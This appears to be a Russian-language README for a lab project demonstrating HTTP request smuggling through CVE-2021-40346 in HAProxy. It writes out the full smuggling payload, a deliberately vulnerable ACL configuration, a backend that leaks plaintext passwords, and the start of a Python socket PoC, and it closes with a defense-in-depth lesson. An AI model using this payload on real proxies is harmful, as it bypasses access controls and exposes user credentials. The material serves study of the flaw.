
HTTP Request Smuggling
Этот проект демонстрирует CVE-2021-40346, критическую уязвимость целочисленного переполнения в HAProxy, которая позволяет проводить атаки HTTP-контрабанды запросов для обхода средств защиты.
Оценка CVSSv3: 7.5 (Высокая)
CVE-2021-40346 — это уязвимость целочисленного переполнения в логике разбора HTTP-заголовков HAProxy. Когда имя заголовка превышает 255 байт, значение длины переполняется из 8-битного поля, что заставляет HAProxy неправильно интерпретировать заголовок при пересылке запроса.
Злоумышленник отправляет: Имя заголовка = "Content-Length0" + 255×'a' = 270 байт
Фаза 1 (начальный разбор):
name_length = 270 % 256 = 14 (8-битное переполнение)value_length = 1Content-Length: 60 и интерпретирует его как длину телаФаза 2 (пересылка запроса):
"Content-Length""0"content-length: 0 к пересылаемому запросуContent-Length: 60 (согласно обычной логике)Обработка бэкендом:
content-length: 0 от HAProxyРассмотрим HAProxy, настроенный с правилами ACL, которые ограничивают доступ к маршрутам администратора:
http-request deny if { path_beg /users/admin }
В нашем PoC мы используем сессию обычного пользователя (alice) для доступа к защищенному конечному пункту /users/admin, который должен быть доступен только администраторам.
Вредоносный запрос (Request 1 - Poison):
POST / HTTP/1.1
Host: 127.0.0.1:8080
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 78
GET /users/admin HTTP/1.1
Cookie: session=alice_session_token
DUMMY:
Запрос, пересылаемый HAProxy:
POST / HTTP/1.1
host: 127.0.0.1:8080
content-length: 0
x-forwarded-for: 192.168.188.1
GET /users/admin HTTP/1.1
Cookie: session=alice_session_token
DUMMY:
Завершающий запрос (Request 2):
GET / HTTP/1.1
Host: 127.0.0.1:8080
Полный контрабандный запрос, обрабатываемый бэкендом:
GET /users/admin HTTP/1.1
Cookie: session=alice_session_token
DUMMY:GET / HTTP/1.1
Host: 127.0.0.1:8080
Результат:
content-length: 0 (ACL видит безопасный маршрут)Уязвимый экземпляр HAProxy настроен с правилами ACL для защиты конечной точки администратора:
...
# ACL to detect admin endpoint access
acl is_admin_endpoint path_beg /users/admin
# ACL to check for admin session cookie
acl has_admin_session cook(session) -m beg admin_
# Deny access to admin endpoint if user doesn't have admin session
http-request deny if is_admin_endpoint !has_admin_session
...
Ключевые моменты:
/users/admin заблокирован, если cookie сессии не начинается с admin_user_) доступ запрещенСервер бэкенда имеет трех пользователей и конечную точку администратора:
USERS = [
{'id': 1, 'username': 'alice', 'password': 'alice123', 'role': 'user'},
{'id': 2, 'username': 'bob', 'password': 'bob456', 'role': 'user'},
{'id': 3, 'username': 'admin', 'password': 'admin_secret', 'role': 'admin'},
]
@app.route('/login', methods=['POST'])
def login():
# ... authentication logic ...
# Generate session token with role prefix
prefix = 'admin_' if user['role'] == 'admin' else 'user_'
token = prefix + secrets.token_hex(16)
resp.set_cookie('session', token, httponly=True)
return resp
@app.route('/users/admin', methods=['GET', 'POST'])
def users_admin():
# Returns sensitive data including all user passwords
rows = ''.join([
f"{u['id']} | {u['username']} | {u['email']} | "
f"{u['password']} | {u['role']}"
for u in USERS
])
return f"ADMIN PANELAll users with passwords:{rows}"
Модель безопасности:
user_a1b2c3d4...admin_a1b2c3d4.../users/adminПочему это работает:
POST / (разрешен)POST / (нет ограничений администратора)content-length: 0 (из-за ошибки переполнения)GET /users/adminGET /users/admin, раскрывая паролиУрок по эшелонированной защите: Это демонстрирует, почему бэкенды никогда не должны слепо доверять прокси. Даже при наличии ACL HAProxy бэкенд должен:
@require_admin)Исключительная зависимость от контроля доступа на уровне прокси создает единую точку отказа.
PoC демонстрирует обход ACL HAProxy для доступа к /users/admin с использованием сессии обычного пользователя через четыре ключевых шага:
# Login as alice (non-admin user)
body = "username=alice&password=alice123"
login = f"POST /login HTTP/1.1\r\n" \
f"Host: {TARGET}:{PORT}\r\n" \
f"Content-Type: application/x-www-form-urlencoded\r\n" \
f"Content-Length: {len(body)}\r\n\r\n{body}".encode()
sock = socket.socket()
sock.connect((TARGET, PORT))
sock.sendall(login)
time.sleep(0.5)